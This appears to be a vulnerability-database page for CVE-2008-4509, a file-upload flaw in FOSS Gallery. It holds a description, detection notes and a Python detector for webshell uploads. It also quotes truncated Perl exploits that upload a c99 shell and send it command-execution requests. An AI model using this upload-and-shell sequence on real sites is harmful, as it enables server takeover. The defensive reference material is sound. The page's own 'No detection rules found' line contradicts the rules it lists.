CVE-2008-4509
Published 2008-10-09
Priority: P2 · 61 · critical · CVSS 2.0 score 10
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 7.66% (93.8th percentile)
Unrestricted file upload vulnerability in processFiles.php in FOSS Gallery Admin and FOSS Gallery Public 1.0 beta allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in the root directory.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| foss_gallery | foss_gallery | — | — |
Detection & IOCs (extracted from sources)
- Detect multipart/form-data POST requests to processFiles.php containing the fields 'uploadNeed' and 'uploadFile0' with a non-image (e.g., .php) file extension in the uploaded filename.
- Alert on HTTP GET requests to PHP files (e.g., shell.php, c99.php) placed in the web root immediately after a POST to processFiles.php, indicating successful webshell upload and execution.
- Detect c99 webshell command execution pattern in HTTP requests: query string containing 'act=cmd' combined with 'cmd_txt=1&submit=Execute' targeting an uploaded PHP file in the web root.
- Flag the response string 'uploaded sucessful' (note the typo) in HTTP responses from processFiles.php as a confirmation indicator of successful arbitrary file upload exploitation.
- The vulnerability affects both FOSS Gallery Admin and FOSS Gallery Public 1.0 beta. The upload endpoint processFiles.php is shared between both products, so detection rules should not be scoped to only one variant.
- Uploaded files land directly in the web root (root directory), not a sandboxed upload folder, making them immediately web-accessible and executable by the server.
- No server-side image format validation is performed; any file extension is accepted. Detection must cover all executable extensions (.php, .php5, .phtml, etc.), not just .php.
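One way to express the request-level detections above as code, as an added example that is not part of the original page or of any vendor rule set. It assumes proxy or WAF records already parsed into dictionaries; the field names (`ts`, `method`, `url`, `ctype`, `form`, `files`, `resp`), the host `gallery.example`, the 300-second correlation window and the `.phar`/`.pht` extensions are assumptions, and the `SAMPLE` records are constructed.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs

# .php/.php5/.phtml come from the page; .phar and .pht are assumptions added here.
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)$", re.I)
FILE_FIELD = re.compile(r"^uploadFile\d+$")

def detect(events, window=300):
    """Return (ts, rule, detail) findings for the request patterns listed above."""
    findings, planted = [], {}  # planted: URL path of an uploaded file -> upload time
    for ev in sorted(events, key=lambda e: e["ts"]):
        url = urlsplit(ev["url"])
        base, leaf = posixpath.split(url.path)
        if ev["method"] == "POST" and leaf.lower() == "processfiles.php":
            multipart = ev.get("ctype", "").lower().startswith("multipart/form-data")
            names = [n.strip() for f, n in ev.get("files", {}).items()
                     if FILE_FIELD.match(f) and EXEC_EXT.search(n.strip())]
            if multipart and "uploadNeed" in ev.get("form", {}) and names:
                for n in names:  # files land beside processFiles.php, in the web root
                    planted[posixpath.join(base, posixpath.basename(n))] = ev["ts"]
                findings.append((ev["ts"], "exec-upload", ",".join(names)))
                if "uploaded sucessful" in ev.get("resp", ""):  # typo is the app's own
                    findings.append((ev["ts"], "upload-confirmed", ",".join(names)))
        elif ev["method"] == "GET":
            q = parse_qs(url.query)
            if url.path in planted and ev["ts"] - planted[url.path] <= window:
                findings.append((ev["ts"], "uploaded-file-requested", url.path))
            if (q.get("act") == ["cmd"] and q.get("cmd_txt") == ["1"]
                    and q.get("submit") == ["Execute"]):
                findings.append((ev["ts"], "c99-cmd-pattern", url.path))
    return findings

SAMPLE = [  # constructed records, not real traffic
    {"ts": 100, "method": "POST", "url": "http://gallery.example/processFiles.php",
     "ctype": "multipart/form-data; boundary=x", "form": {"uploadNeed": "1"},
     "files": {"uploadFile0": "holiday.jpg"}, "resp": "uploaded sucessful"},
    {"ts": 200, "method": "POST", "url": "http://gallery.example/processFiles.php",
     "ctype": "multipart/form-data; boundary=y", "form": {"uploadNeed": "1"},
     "files": {"uploadFile0": "notes.PHTML"}, "resp": "uploaded sucessful"},
    {"ts": 230, "method": "GET", "url": "http://gallery.example/notes.PHTML"},
    {"ts": 900, "method": "GET", "url": "http://gallery.example/index.php"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(finding)
```

The rules key on the endpoint name and field names rather than on one product path, so they apply to both the Admin and Public variants.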
No detection rules found.
Exploit-DB
FOSS Gallery Public 1.0 - Arbitrary File Upload (PoC)
exploitdb·2008-10-05
---
FOSS Gallery Public Version
eNYe-Sec - www.enye-sec.org
-- Bug --
Website doesn't check the images format and you can upload PHP files.
-- Exploit --
http://localhost/shell.php
# milw0rm.com [2008-10-05]
Exploit-DB
FOSS Gallery Public 1.0 - Arbitrary File Upload
exploitdb·2008-10-05
---
```perl
# FOSS Gallery Public new();
$ua->timeout(12);
my $request = HTTP::Request->new();
my $response;
my $header;
my $url = $host."processFiles.php";
$response = $ua->request(POST $url, Content_Type => 'form-data',
Content => [ uploadNeed => "1", uploadFile0 => [$file]]);
$content = $response->content;
if ($content =~ /uploaded sucessful/) { print "\nExploited sucessfully.\n"; }
else { print "\nExploit failed\n"; exit;}
my $c99="c99.php";
chomp ($c99);
if ($file =~ /c99.php/)
{
$comando="?act=cmd&d=/&cmd=/&cmd_txt=1&submit=Execute";
print "\n";
my $final = $host.$c99.$comando;
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$ua->timeout(10);
$doc = $ua->request($req)->as_string;
$kernel = $1 if ( $doc
```
Exploit-DB
FOSS Gallery Admin 1.0 - Arbitrary File Upload
exploitdb·2008-10-04
---
```perl
#!/usr/bin/perl
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# FOSS Gallery Admin Version
# eNYe-Sec - www.enye-sec.org
#
# Upload images is only allowed to the admin but the process to upload has
# 3 steps (with 3 pages). only the first page check the user permissions.
#
# STEPS:
# uploadForm1.php -> ask for the number of files you wish to upload
# uploadForm2.php -> ask for the files to upload
# processFiles.php -> process the file(s)
#
# Also image format is not validated and you can upload any file.
#
# You can POST directly in the 3th step (processFiles.php):
# - uploadNeed = 1 ... we only need to upload 1 file
# - uploadFile0 = shell.php ... the file to upload
use LWP::UserAgent;
use HTTP::Request:
```
No writeups or analysis indexed.
- http://securityreason.com/securityalert/4379
- http://www.securityfocus.com/bid/31574
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45683
- https://www.exploit-db.com/exploits/6670
- https://www.exploit-db.com/exploits/6674
- https://www.exploit-db.com/exploits/6680

Published: 2008-10-09